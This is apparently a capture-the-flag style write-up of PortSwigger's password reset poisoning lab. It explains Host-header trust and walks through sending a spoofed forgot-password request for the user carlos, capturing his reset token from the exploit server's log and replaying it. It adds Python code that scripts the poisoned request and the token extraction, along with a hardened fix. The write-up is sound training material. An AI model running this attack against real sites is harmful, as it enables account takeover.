apsyleg · 1 min read
#portswigger #authentication #web-security

Basic Password Reset Poisoning

Lab

Basic password reset poisoning · Practitioner

Solution

Given

This lab is vulnerable to password reset poisoning. The user `carlos` will carelessly click on any links in emails that he receives. To solve the lab, log in to Carlos's account.

You can log in to your own account using the following credentials: `wiener:peter`. Any emails sent to this account can be read via the email client on the exploit server.

Analyzing the task

PortSwigger has a dedicated note on «Password reset poisoning» and a whole series on «HTTP Host Header attacks». A web application often has no reliable knowledge of the address it is hosted at, so when it needs to generate an absolute URL back to itself it takes the domain from the incoming Host header. That is exactly what the password reset feature does: it mails out a reset link containing a one-time token, and if the domain in that link is built from an attacker-supplied Host header, the victim's browser will send the token to the attacker's server when the link is clicked.

Recon

Let's look at the password reset request and see whether the application trusts the Host header.

We send a reset request for our own user `wiener`. Then we send it again, but replace the Host header with our exploit server's address:

exploit-0a1a00a804fbe14180d3d4d001e100bf.exploit-server.net

Both requests come back 200, so the application does not validate the Host header. Let's check the emails on the exploit server:

  • First — with a link to the vulnerable site
  • Second — link to our exploit server

OK, the domain in the reset link is under our control. Now, keeping the poisoned Host header, we replace the `username` field with `carlos` and submit the request again. Carlos clicks the link in his email, so his browser requests the reset path (token included) from our exploit server. Off to the exploit server's access logs.

There's the victim's request, with his reset token in the query string:

/forgot-password?temp-forgot-password-token=3lc3xbctomlakufr3oftagyorpysgvwo

We open that path on the real lab site (not on the exploit server), set any new password for carlos, and log in as carlos.
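The whole flow above, as an added example that is not part of the original write-up or of PortSwigger's lab code: the poisoned `POST /forgot-password` request with a spoofed Host header, a vulnerable link builder that trusts that header beside a hardened one that uses a configured canonical host and rejects anything else, and a parser that pulls the leaked token out of the exploit server's access log. The lab host name, the log lines and the log format are constructed for illustration; only the exploit server host and the token are taken from the write-up.

```python
"""Basic password reset poisoning, modelled end to end.

Added example; not code from the write-up or from PortSwigger. The lab host,
the log lines and the log format are assumptions made for illustration.
"""
import re
from typing import Dict, Optional
from urllib.parse import parse_qs, urlencode, urlparse

# Hypothetical canonical host of the vulnerable application (not shown on the page).
LAB_HOST = "vulnerable-site.example"
# Exploit server host from the write-up.
ATTACKER_HOST = "exploit-0a1a00a804fbe14180d3d4d001e100bf.exploit-server.net"


def build_reset_request(username: str, spoofed_host: str) -> str:
    """Raw HTTP request the attacker sends: the body names the victim,
    the Host header names the attacker's server."""
    body = urlencode({"username": username})
    return (
        "POST /forgot-password HTTP/1.1\r\n"
        f"Host: {spoofed_host}\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {len(body)}\r\n"
        "\r\n"
        f"{body}"
    )


def vulnerable_reset_link(headers: Dict[str, str], token: str) -> str:
    """Vulnerable: the domain of the emailed link is whatever Host the client sent."""
    return f"https://{headers['Host']}/forgot-password?temp-forgot-password-token={token}"


def hardened_reset_link(headers: Dict[str, str], token: str,
                        canonical_host: str = LAB_HOST) -> str:
    """Hardened: the link is built from configuration, never from the request,
    and a request whose Host is not the canonical host is refused outright."""
    host = headers.get("Host", "")
    if host.lower() != canonical_host.lower():
        raise ValueError(f"unexpected Host header: {host!r}")
    return f"https://{canonical_host}/forgot-password?temp-forgot-password-token={token}"


# Constructed access-log lines in an assumed format; the token is the one from the write-up.
SAMPLE_ACCESS_LOG = """\
10.0.3.174  2024-01-01 12:00:01 +0000 "GET / HTTP/1.1" 200 "User-Agent: Mozilla/5.0"
10.0.3.174  2024-01-01 12:00:03 +0000 "GET /forgot-password?temp-forgot-password-token=3lc3xbctomlakufr3oftagyorpysgvwo HTTP/1.1" 404 "User-Agent: Mozilla/5.0"
"""

REQUEST_LINE_RE = re.compile(r'"GET (?P<path>\S+) HTTP/1\.[01]"')


def token_from_access_log(log: str) -> Optional[str]:
    """Return the first temp-forgot-password-token seen in the attacker's log, if any."""
    for line in log.splitlines():
        match = REQUEST_LINE_RE.search(line)
        if not match:
            continue
        query = parse_qs(urlparse(match.group("path")).query)
        tokens = query.get("temp-forgot-password-token")
        if tokens:
            return tokens[0]
    return None


def victim_reset_url(token: str, lab_host: str = LAB_HOST) -> str:
    """The URL the attacker actually opens: the leaked token against the real lab host."""
    return f"https://{lab_host}/forgot-password?temp-forgot-password-token={token}"


if __name__ == "__main__":
    print(build_reset_request("carlos", ATTACKER_HOST))
    print(vulnerable_reset_link({"Host": ATTACKER_HOST}, "TOKEN"))
    token = token_from_access_log(SAMPLE_ACCESS_LOG)
    print("leaked token:", token)
    print("open on the lab host:", victim_reset_url(token))
```

The important detail for the last step is `victim_reset_url`: the path in the access log points at the exploit server, which has no reset endpoint, so the token has to be replayed against the real application host. On the defensive side, `hardened_reset_link` mirrors the usual fix: an allowlist of permitted hosts, with absolute URLs generated from configuration rather than from request headers.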

Lab solved!